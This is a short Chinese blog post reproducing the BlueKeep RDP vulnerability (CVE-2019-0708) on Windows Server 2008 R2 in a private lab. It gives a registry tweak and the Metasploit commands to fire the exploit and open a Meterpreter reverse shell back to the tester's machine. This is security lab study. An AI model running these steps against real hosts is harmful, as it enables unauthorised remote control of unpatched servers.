1590天 博客通用头像 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现

发布于 2个月前 / 29 次围观 / 0 条评论 / 技术学习 / Edwiin
本文最后更新于2020-5-13,已超过 1 个月没有更新,如果文章内容或图片资源失效,请【留言反馈】,我会及时处理,谢谢!

0x01前言

复现完了win7,在来水一篇复现2008的,虽然比较鸡肋。

0x02环境

这里我使用的是 Microsoft Windows Server 2008 R2 Enterprise 

依旧开启3389关闭防火墙

0x03复现

首先要修改注册表HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam为 0(好鸡肋啊!!!) 不修改的话我测试都是蓝屏

然后启动msf使用模块(没有配置模块的可以看看我前面的文章)

use exploit/rdp/cve_2019_0708_bluekeep_rce

然后配置参数

set RDP_CLIENT_IP 192.168.0.121 //设置自己的ip

set RHOSTS 192.168.0.116 //设置靶机ip

set target 1//设置1

set payload windows/x64/meterpreter/reverse_tcp //设置payload

set lhost 192.168.0.121 //设置自己的ip


小火车启动嘟嘟嘟

复现成功。

全站顶部广告位

  • 支付宝赞助图片
  • 微信赞助图片
  • QQ赞助图片
头像
描述: 还好有你,再见如初。